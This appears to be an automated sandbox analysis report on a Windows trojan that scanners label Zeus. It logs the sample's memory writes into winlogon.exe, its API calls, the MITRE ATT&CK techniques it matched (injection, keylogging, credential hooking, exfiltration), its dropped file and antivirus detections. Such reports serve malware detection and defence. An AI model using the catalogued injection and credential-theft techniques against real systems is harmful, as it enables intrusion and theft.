Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDD6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDE0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDE1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CDF6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE00000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE01000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE12000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE14000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE16000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE20000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE21000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE32000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE34000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE36000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE40000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE41000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE52000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE54000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE56000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE60000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE61000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE72000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE74000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE76000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE80000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE81000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE92000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE94000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CE96000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEA0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEA1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEB6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEC0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEC1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CED2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CED4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CED6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEE0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEE1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CEF6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF00000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF01000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF12000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF14000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF16000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF20000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF21000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF32000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF34000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF36000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF40000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF41000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF52000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF54000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF56000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF60000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF61000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF72000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF74000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF76000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF80000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF81000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF92000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF94000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CF96000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFA0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFA1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFB6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFC0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFC1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFD6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFE0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFE1000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF2000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF4000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: CFF6000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D000000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D001000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D012000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D014000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D016000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D020000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D021000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D032000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D034000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D036000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D040000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D041000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D052000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D054000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D056000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D060000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D061000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D072000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D074000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D076000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D080000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D081000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D092000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D094000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D096000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exeMemory written: C:\Windows\System32\winlogon.exe base: D0A0000Jump to behavior
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_004105E8 InitializeSecurityDescriptor,SetSecurityDescriptorDacl
Source: Ue0N2amgcH.exe, 00000000.00000002.463822693.0000000000D90000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000000.198836928.000002388D3F0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: Ue0N2amgcH.exe, 00000000.00000002.463822693.0000000000D90000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000000.198836928.000002388D3F0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: Ue0N2amgcH.exe, 00000000.00000002.463822693.0000000000D90000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000000.198836928.000002388D3F0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: Ue0N2amgcH.exe, 00000000.00000002.463822693.0000000000D90000.00000002.00000001.sdmp, winlogon.exe, 00000002.00000000.198836928.000002388D3F0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_00409115 RtlAllocateHeap,CreateNamedPipeW,CreateEventW,CreateEventW,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_0040B44D RtlAllocateHeap,CreateEventW,InternetQueryOptionA,InternetSetStatusCallback,InternetSetOptionA,InternetReadFileExA,GetLastError,DispatchMessageW,PeekMessageW,MsgWaitForMultipleObjects,ResetEvent,InternetSetOptionA,InternetSetStatusCallback,CloseHandle,InternetQueryOptionA,InternetCrackUrlA,GetSystemTime,wnsprintfW,GetSystemTime,InternetQueryOptionA,GetUrlCacheEntryInfoW,RtlEnterCriticalSection,RtlLeaveCriticalSection
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_00409475 HeapCreate,GetProcessHeap,RtlAllocateHeap,GetCurrentProcessId,IsBadHugeReadPtr,GetUserDefaultUILanguage,GetUserNameW
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_0040D054 GetTimeZoneInformation
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_004106B9 GetTickCount,GetVersionExW,GetUserDefaultUILanguage,GetModuleFileNameW
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_0040E457 socket,bind,closesocket
Source: C:\Users\user\Desktop\Ue0N2amgcH.exe | Code function: 0_2_0040E2D4 socket,bind,listen,closesocket

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts (1) | Native API (1) | Valid Accounts (1) | Valid Accounts (1) | Masquerading (2) | Input Capture (11) | System Time Discovery (2) | Remote Services | Input Capture (11) | Exfiltration Over Other Network Medium | Encrypted Channel (2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot (1)
Default Accounts | Scheduled Task/Job | Registry Run Keys / Startup Folder (1) | Access Token Manipulation (11) | Valid Accounts (1) | LSASS Memory | Security Software Discovery (1) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Application Shimming (1) | Process Injection (42) | Virtualization/Sandbox Evasion (1) | Security Account Manager | Virtualization/Sandbox Evasion (1) | SMB/Windows Admin Shares | Clipboard Data (1) | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder (1) | Access Token Manipulation (11) | NTDS | Process Discovery (3) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Application Shimming (1) | Process Injection (42) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information (1) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Install Root Certificate (1) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing (13) | Proc Filesystem | System Information Discovery (3) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue

(Numbers in parentheses are the count of matched signatures per technique.)

Behavior Graph

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Ue0N2amgcH.exe | 90% | Virustotal | -
Ue0N2amgcH.exe | 100% | ReversingLabs | Win32.Trojan.Zeus
Ue0N2amgcH.exe | 100% | Avira | TR/Crypt.ZPACK.Gen
Ue0N2amgcH.exe | 100% | Joe Sandbox ML | -

Dropped Files

Source | Detection | Scanner | Label
C:\Windows\SysWOW64\sdra64.exe | 100% | Avira | TR/Dropper.Gen
C:\Windows\SysWOW64\sdra64.exe | 100% | Joe Sandbox ML | -

Unpacked PE Files

Source | Detection | Scanner | Label
2.2.winlogon.exe.111a0000.580.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.d6a0000.108.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.11e80000.683.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.d1a0000.68.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.10c20000.536.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.d8a0000.124.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.11360000.594.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.fa60000.394.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.12600000.743.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.10760000.498.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.127c0000.757.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.d740000.113.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.f440000.345.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.12da0000.804.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.10fc0000.565.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.11780000.627.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.12d20000.800.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.d1c0000.69.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.124c0000.733.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.10800000.503.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.eaa0000.268.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.e060000.186.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.fae0000.398.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.100c0000.445.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.12ac0000.781.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.dfa0000.180.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.f260000.330.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.11ac0000.653.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.11180000.579.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.e5e0000.230.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.e480000.219.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.fa40000.393.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.11060000.570.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.dfe0000.182.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.fa80000.395.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.106c0000.493.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.11ce0000.670.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.e660000.234.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.e7c0000.245.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.11220000.584.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.ed20000.288.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.f920000.384.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.10de0000.550.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.fd20000.416.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.ebe0000.278.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.d5a0000.100.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.fb80000.403.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.11080000.571.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.11ea0000.684.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.efa0000.308.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.d2e0000.78.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.f420000.344.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.f540000.353.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.12a00000.775.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.12700000.751.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.12b40000.785.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.122a0000.716.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.f580000.355.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.e7e0000.246.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.11f20000.688.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.c960000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.e360000.210.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.d960000.130.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.10160000.450.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.e6e0000.238.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.10da0000.548.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.f9e0000.390.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.f9a0000.388.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.db00000.143.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.11640000.617.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.10c00000.535.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.11920000.640.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.eac0000.269.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.10f20000.560.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.10e60000.554.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.cfe0000.54.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.winlogon.exe.ce40000.41.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10620000.488.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d040000.57.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.e9a0000.260.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.12360000.722.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11c60000.666.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10f60000.562.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11140000.577.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10960000.514.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11b40000.657.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.ca00000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.102c0000.461.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.128e0000.766.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d880000.123.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.11d60000.674.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.cbc0000.21.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10720000.496.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.d7a0000.116.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.df20000.176.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.efe0000.310.unpack100%AviraTR/Crypt.XPACK.GenDownload File
2.2.winlogon.exe.10680000.491.unpack100%AviraTR/Crypt.XPACK.GenDownload File
